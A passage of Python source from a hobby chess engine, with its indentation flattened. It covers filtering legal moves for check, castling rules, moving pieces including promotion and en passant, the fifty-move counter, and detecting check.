remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
elif white_rooks[i][1] == black_king[0][1]:
if white_rooks[i][0] > black_king[0][0]:
for j in range(1, abs(white_rooks[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1]:
remove = False
else:
for j in range(1, abs(white_rooks[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1]:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 9):
remove = True
if white_queens[i][2] == True and abs(white_queens[i][0] - black_king[0][0]) == abs(white_queens[i][1] - black_king[0][1]):
if white_queens[i][0] > black_king[0][0]:
if white_queens[i][1] > black_king[0][1]:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1] - j:
remove = False
else:
if white_queens[i][1] > black_king[0][1]:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
remove = True
if white_queens[i][2] == True:
if white_queens[i][0] == black_king[0][0]:
if white_queens[i][1] > black_king[0][1]:
for j in range(1, abs(white_queens[i][1] - black_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] and white_occ_y[k] == black_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] and black_occ_y[k] == black_king[0][1] + j:
remove = False
else:
for j in range(1, abs(white_queens[i][1] - black_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] and white_occ_y[k] == black_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] and black_occ_y[k] == black_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
elif white_queens[i][1] == black_king[0][1]:
if white_queens[i][0] > black_king[0][0]:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] + j and white_occ_y[k] == black_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] + j and black_occ_y[k] == black_king[0][1]:
remove = False
else:
for j in range(1, abs(white_queens[i][0] - black_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == black_king[0][0] - j and white_occ_y[k] == black_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == black_king[0][0] - j and black_occ_y[k] == black_king[0][1]:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
if abs(white_king[0][0] - black_king[0][0]) <= 1 and abs(white_king[0][1] - black_king[0][1]) <= 1:
if move in self.legal_moves:
self.legal_moves.remove(move)
if white_short_castle_through_check_check == True:
white_short_castle_through_check_check = False
if move not in self.legal_moves:
if "O-O" in self.legal_moves:
self.legal_moves.remove("O-O")
elif white_long_castle_through_check_check == True:
white_long_castle_through_check_check = False
if move not in self.legal_moves:
if "O-O-O" in self.legal_moves:
self.legal_moves.remove("O-O-O")
elif black_short_castle_through_check_check == True:
black_short_castle_through_check_check = False
if move not in self.legal_moves:
if "O-O" in self.legal_moves:
self.legal_moves.remove("O-O")
elif black_long_castle_through_check_check == True:
black_long_castle_through_check_check = False
if move not in self.legal_moves:
if "O-O-O" in self.legal_moves:
self.legal_moves.remove("O-O-O")
#print(self.legal_moves)
def convert_to_easy_notation(self, notation_val):
take = False
if notation_val[-1] == "+":
notation_val = notation_val.replace("+", "")
for character in notation_val:
if character == "x":
take = True
notation_val = notation_val.replace("x", "")
return notation_val, take
def move_piece(self, notation_val, take):
self.en_passant_x_y = [8, 8]
self.half_moves += 1
if startup.white_turn == False:
self.turn_num += 1
if notation_val[0] == "B":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True and self.white_bishops_inf[i][0] == from_x and self.white_bishops_inf[i][1] == from_y:
self.white_bishops_inf[i][0] = to_x
self.white_bishops_inf[i][1] = to_y
else:
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True and self.black_bishops_inf[i][0] == from_x and self.black_bishops_inf[i][1] == from_y:
self.black_bishops_inf[i][0] = to_x
self.black_bishops_inf[i][1] = to_y
elif notation_val[0] == "N":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if self.white_knights_inf[i][2] == True and self.white_knights_inf[i][0] == from_x and self.white_knights_inf[i][1] == from_y:
self.white_knights_inf[i][0] = to_x
self.white_knights_inf[i][1] = to_y
else:
for i in range(0, 10):
if self.black_knights_inf[i][2] == True and self.black_knights_inf[i][0] == from_x and self.black_knights_inf[i][1] == from_y:
self.black_knights_inf[i][0] = to_x
self.black_knights_inf[i][1] = to_y
elif notation_val[0] == "R":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True and self.white_rooks_inf[i][0] == from_x and self.white_rooks_inf[i][1] == from_y:
self.white_rooks_inf[i][0] = to_x
self.white_rooks_inf[i][1] = to_y
self.white_rooks_inf[i][3] = False
else:
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True and self.black_rooks_inf[i][0] == from_x and self.black_rooks_inf[i][1] == from_y:
self.black_rooks_inf[i][0] = to_x
self.black_rooks_inf[i][1] = to_y
self.black_rooks_inf[i][3] = False
elif notation_val[0] == "Q":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 9):
if self.white_queens_inf[i][2] == True and self.white_queens_inf[i][0] == from_x and self.white_queens_inf[i][1] == from_y:
self.white_queens_inf[i][0] = to_x
self.white_queens_inf[i][1] = to_y
else:
for i in range(0, 9):
if self.black_queens_inf[i][2] == True and self.black_queens_inf[i][0] == from_x and self.black_queens_inf[i][1] == from_y:
self.black_queens_inf[i][0] = to_x
self.black_queens_inf[i][1] = to_y
elif notation_val[0] == "K":
from_x = notation.get_column_char(notation_val[1])
from_y = int(notation_val[2]) - 1
to_x = notation.get_column_char(notation_val[3])
to_y = int(notation_val[4]) - 1
if startup.white_turn == True:
if self.white_king_inf[0][2] == True and self.white_king_inf[0][0] == from_x and self.white_king_inf[0][1] == from_y:
self.white_king_inf[0][0] = to_x
self.white_king_inf[0][1] = to_y
self.white_king_inf[0][3] = False
else:
if self.black_king_inf[0][2] == True and self.black_king_inf[0][0] == from_x and self.black_king_inf[0][1] == from_y:
self.black_king_inf[0][0] = to_x
self.black_king_inf[0][1] = to_y
self.black_king_inf[0][3] = False
elif notation_val[0] == "O":
if startup.white_turn == True:
self.white_king_inf[0][3] = False
if notation_val == "O-O":
self.white_rooks_inf[1][3] = False
self.white_king_inf[0][0] = 6
self.white_king_inf[0][1] = 0
for i in range(0, 2):
if self.white_rooks_inf[i][0] == 7:
self.white_rooks_inf[i][0] = 5
self.white_rooks_inf[i][1] = 0
elif notation_val == "O-O-O":
self.white_rooks_inf[0][3] = False
self.white_king_inf[0][0] = 2
self.white_king_inf[0][1] = 0
for i in range(0, 2):
if self.white_rooks_inf[i][0] == 0:
self.white_rooks_inf[i][0] = 3
self.white_rooks_inf[i][1] = 0
else:
self.black_king_inf[0][3] = False
if notation_val == "O-O":
self.black_rooks_inf[1][3] = False
self.black_king_inf[0][0] = 6
self.black_king_inf[0][1] = 7
for i in range(0, 2):
if self.black_rooks_inf[i][0] == 7:
self.black_rooks_inf[i][0] = 5
self.black_rooks_inf[i][1] = 7
elif notation_val == "O-O-O":
self.black_rooks_inf[0][3] = False
self.black_king_inf[0][0] = 2
self.black_king_inf[0][1] = 7
for i in range(0, 2):
if self.black_rooks_inf[i][0] == 0:
self.black_rooks_inf[i][0] = 3
self.black_rooks_inf[i][1] = 7
else:
self.half_moves = 0
if notation_val[-2] == "=":
to_x = notation.get_column_char(notation_val[-4])
to_y = int(notation_val[-3]) - 1
else:
to_x = notation.get_column_char(notation_val[-2])
to_y = int(notation_val[-1]) - 1
if take == True:
if notation_val[-2] == "=":
from_x = notation.get_column_char(notation_val[-5])
else:
from_x = notation.get_column_char(notation_val[-3])
if startup.white_turn == True:
from_y = to_y - 1
else:
from_y = to_y + 1
else:
from_x = to_x
if startup.white_turn == True:
if to_y == 3:
from_y = to_y - 2
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == from_x and self.white_pawns_inf[i][1] == to_y - 1:
from_y = to_y - 1
else:
from_y = to_y - 1
else:
if to_y == 4:
from_y = to_y + 2
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == from_x and self.black_pawns_inf[i][1] == to_y + 1:
from_y = to_y + 1
else:
from_y = to_y + 1
if startup.white_turn == True:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == from_x and self.white_pawns_inf[i][1] == from_y:
if to_y == 7:
self.white_pawns_inf[i][2] = False
if notation_val[-1] == "Q":
promotion_complete = False
for i in range(1, 9):
if self.white_queens_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.white_queens_inf[i][0] = to_x
self.white_queens_inf[i][1] = to_y
self.white_queens_inf[i][2] = True
elif notation_val[-1] == "R":
promotion_complete = False
for i in range(2, 10):
if self.white_rooks_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.white_rooks_inf[i][0] = to_x
self.white_rooks_inf[i][1] = to_y
self.white_rooks_inf[i][2] = True
self.white_rooks_inf[i][3] = False
elif notation_val[-1] == "B":
promotion_complete = False
for i in range(2, 10):
if self.white_bishops_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.white_bishops_inf[i][0] = to_x
self.white_bishops_inf[i][1] = to_y
self.white_bishops_inf[i][2] = True
elif notation_val[-1] == "N":
promotion_complete = False
for i in range(2, 10):
if self.white_knights_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.white_knights_inf[i][0] = to_x
self.white_knights_inf[i][1] = to_y
self.white_knights_inf[i][2] = True
else:
self.white_pawns_inf[i][0] = to_x
self.white_pawns_inf[i][1] = to_y
self.white_pawns_inf[i][3] = False
if to_y - from_y == 2:
self.en_passant_x_y = [to_x, to_y]
else:
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == from_x and self.black_pawns_inf[i][1] == from_y:
if to_y == 0:
self.black_pawns_inf[i][2] = False
if notation_val[-1] == "Q":
promotion_complete = False
for i in range(1, 9):
if self.black_queens_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.black_queens_inf[i][0] = to_x
self.black_queens_inf[i][1] = to_y
self.black_queens_inf[i][2] = True
elif notation_val[-1] == "R":
promotion_complete = False
for i in range(2, 10):
if self.black_rooks_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.black_rooks_inf[i][0] = to_x
self.black_rooks_inf[i][1] = to_y
self.black_rooks_inf[i][2] = True
self.black_rooks_inf[i][3] = False
elif notation_val[-1] == "B":
promotion_complete = False
for i in range(2, 10):
if self.black_bishops_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.black_bishops_inf[i][0] = to_x
self.black_bishops_inf[i][1] = to_y
self.black_bishops_inf[i][2] = True
elif notation_val[-1] == "N":
promotion_complete = False
for i in range(2, 10):
if self.black_knights_inf[i][2] == False and promotion_complete == False:
promotion_complete = True
self.black_knights_inf[i][0] = to_x
self.black_knights_inf[i][1] = to_y
self.black_knights_inf[i][2] = True
else:
self.black_pawns_inf[i][0] = to_x
self.black_pawns_inf[i][1] = to_y
self.black_pawns_inf[i][3] = False
if from_y - to_y == 2:
self.en_passant_x_y = [to_x, to_y]
if take == True:
self.half_moves = 0
peice_taken = False
if startup.white_turn == True:
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == to_x and self.black_pawns_inf[i][1] == to_y:
self.black_pawns_inf[i][2] = False
peice_taken = True
for i in range(0, 10):
if self.black_bishops_inf[i][2] == True and self.black_bishops_inf[i][0] == to_x and self.black_bishops_inf[i][1] == to_y:
self.black_bishops_inf[i][2] = False
peice_taken = True
for i in range(0, 10):
if self.black_knights_inf[i][2] == True and self.black_knights_inf[i][0] == to_x and self.black_knights_inf[i][1] == to_y:
self.black_knights_inf[i][2] = False
peice_taken = True
for i in range(0, 10):
if self.black_rooks_inf[i][2] == True and self.black_rooks_inf[i][0] == to_x and self.black_rooks_inf[i][1] == to_y:
self.black_rooks_inf[i][2] = False
peice_taken = True
for i in range(0, 9):
if self.black_queens_inf[i][2] == True and self.black_queens_inf[i][0] == to_x and self.black_queens_inf[i][1] == to_y:
self.black_queens_inf[i][2] = False
peice_taken = True
if peice_taken == False:
for i in range(0, 8):
if self.black_pawns_inf[i][2] == True and self.black_pawns_inf[i][0] == to_x and self.black_pawns_inf[i][1] == to_y - 1:
self.black_pawns_inf[i][2] = False
else:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == to_x and self.white_pawns_inf[i][1] == to_y:
self.white_pawns_inf[i][2] = False
peice_taken = True
for i in range(0, 10):
if self.white_bishops_inf[i][2] == True and self.white_bishops_inf[i][0] == to_x and self.white_bishops_inf[i][1] == to_y:
self.white_bishops_inf[i][2] = False
peice_taken = True
for i in range(0, 10):
if self.white_knights_inf[i][2] == True and self.white_knights_inf[i][0] == to_x and self.white_knights_inf[i][1] == to_y:
self.white_knights_inf[i][2] = False
peice_taken = True
for i in range(0, 10):
if self.white_rooks_inf[i][2] == True and self.white_rooks_inf[i][0] == to_x and self.white_rooks_inf[i][1] == to_y:
self.white_rooks_inf[i][2] = False
peice_taken = True
for i in range(0, 9):
if self.white_queens_inf[i][2] == True and self.white_queens_inf[i][0] == to_x and self.white_queens_inf[i][1] == to_y:
self.white_queens_inf[i][2] = False
peice_taken = True
if peice_taken == False:
for i in range(0, 8):
if self.white_pawns_inf[i][2] == True and self.white_pawns_inf[i][0] == to_x and self.white_pawns_inf[i][1] == to_y + 1:
self.white_pawns_inf[i][2] = False
def half_move_check(self):
half_move_limit = False
checkmate = False
if self.half_moves >= 100:
half_move_limit = True
checkmate = self.stale_check_mate()
return half_move_limit, checkmate
def stale_check_mate(self):
checkmate = False
if startup.white_turn == True:
for i in range(0, 8):
if checkmate == False and self.white_king_inf[0][0] + 1 == self.black_pawns_inf[i][0] and self.white_king_inf[0][1] + 1 == self.black_pawns_inf[i][1] and self.black_pawns_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 1 == self.black_pawns_inf[i][0] and self.white_king_inf[0][1] + 1 == self.black_pawns_inf[i][1] and self.black_pawns_inf[i][2] == True:
checkmate = True
for i in range(0, 10):
if checkmate == False and self.white_king_inf[0][0] + 1 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] + 2 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] + 2 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] + 1 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] + 2 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] - 1 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] + 1 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] - 2 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 1 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] - 2 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 2 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] - 1 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 2 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] + 1 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.white_king_inf[0][0] - 1 == self.black_knights_inf[i][0] and self.white_king_inf[0][1] + 2 == self.black_knights_inf[i][1] and self.black_knights_inf[i][2] == True:
checkmate = True
for i in range(0, 10):
remove = True
if checkmate == False and self.black_bishops_inf[i][2] == True and abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0]) == abs(self.black_bishops_inf[i][1] - self.white_king_inf[0][1]):
if self.black_bishops_inf[i][0] > self.white_king_inf[0][0]:
if self.black_bishops_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
else:
if self.black_bishops_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_bishops_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
for i in range(0, 10):
remove = True
if checkmate == False and self.black_rooks_inf[i][2] == True:
if self.black_rooks_inf[i][0] == self.white_king_inf[0][0]:
if self.black_rooks_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_rooks_inf[i][1] - self.white_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_rooks_inf[i][1] - self.white_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
elif self.black_rooks_inf[i][1] == self.white_king_inf[0][1]:
if self.black_rooks_inf[i][0] > self.white_king_inf[0][0]:
for j in range(1, abs(self.black_rooks_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
else:
for j in range(1, abs(self.black_rooks_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
if remove == True:
checkmate = True
for i in range(0, 9):
remove = True
if checkmate == False and self.black_queens_inf[i][2] == True and abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0]) == abs(self.black_queens_inf[i][1] - self.white_king_inf[0][1]):
if self.black_queens_inf[i][0] > self.white_king_inf[0][0]:
if self.black_queens_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
else:
if self.black_queens_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
remove = True
if checkmate == False and self.black_queens_inf[i][2] == True:
if self.black_queens_inf[i][0] == self.white_king_inf[0][0]:
if self.black_queens_inf[i][1] > self.white_king_inf[0][1]:
for j in range(1, abs(self.black_queens_inf[i][1] - self.white_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] and self.white_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] and self.black_occupation_y[k] == self.white_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.black_queens_inf[i][1] - self.white_king_inf[0][1])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] and self.white_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] and self.black_occupation_y[k] == self.white_king_inf[0][1] - j:
remove = False
if remove == True:
checkmate = True
elif self.black_queens_inf[i][1] == self.white_king_inf[0][1]:
if self.black_queens_inf[i][0] > self.white_king_inf[0][0]:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] + j and self.white_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] + j and self.black_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
else:
for j in range(1, abs(self.black_queens_inf[i][0] - self.white_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.white_king_inf[0][0] - j and self.white_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.white_king_inf[0][0] - j and self.black_occupation_y[k] == self.white_king_inf[0][1]:
remove = False
if remove == True:
checkmate = True
else:
for i in range(0, 8):
if checkmate == False and self.black_king_inf[0][0] + 1 == self.white_pawns_inf[i][0] and self.black_king_inf[0][1] - 1 == self.white_pawns_inf[i][1] and self.white_pawns_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 1 == self.white_pawns_inf[i][0] and self.black_king_inf[0][1] - 1 == self.white_pawns_inf[i][1] and self.white_pawns_inf[i][2] == True:
checkmate = True
for i in range(0, 10):
if checkmate == False and self.black_king_inf[0][0] + 1 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] + 2 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] + 2 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] + 1 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] + 2 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] - 1 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] + 1 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] - 2 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 1 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] - 2 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 2 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] - 1 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 2 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] + 1 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
elif checkmate == False and self.black_king_inf[0][0] - 1 == self.white_knights_inf[i][0] and self.black_king_inf[0][1] + 2 == self.white_knights_inf[i][1] and self.white_knights_inf[i][2] == True:
checkmate = True
for i in range(0, 10):
remove = True
if checkmate == False and self.white_bishops_inf[i][2] == True and abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0]) == abs(self.white_bishops_inf[i][1] - self.black_king_inf[0][1]):
if self.white_bishops_inf[i][0] > self.black_king_inf[0][0]:
if self.white_bishops_inf[i][1] > self.black_king_inf[0][1]:
for j in range(1, abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
for k in range(0, len(self.black_occupation_x)):
if self.black_occupation_x[k] == self.black_king_inf[0][0] + j and self.black_occupation_y[k] == self.black_king_inf[0][1] + j:
remove = False
else:
for j in range(1, abs(self.white_bishops_inf[i][0] - self.black_king_inf[0][0])):
for k in range(0, len(self.white_occupation_x)):
if self.white_occupation_x[k] == self.black_king_inf[0][0] + j and self.white_occupation_y[k] == self.black_king_inf[0][1] - j:
remove = False
for k in range(0, len(self.black_occupation_x)):
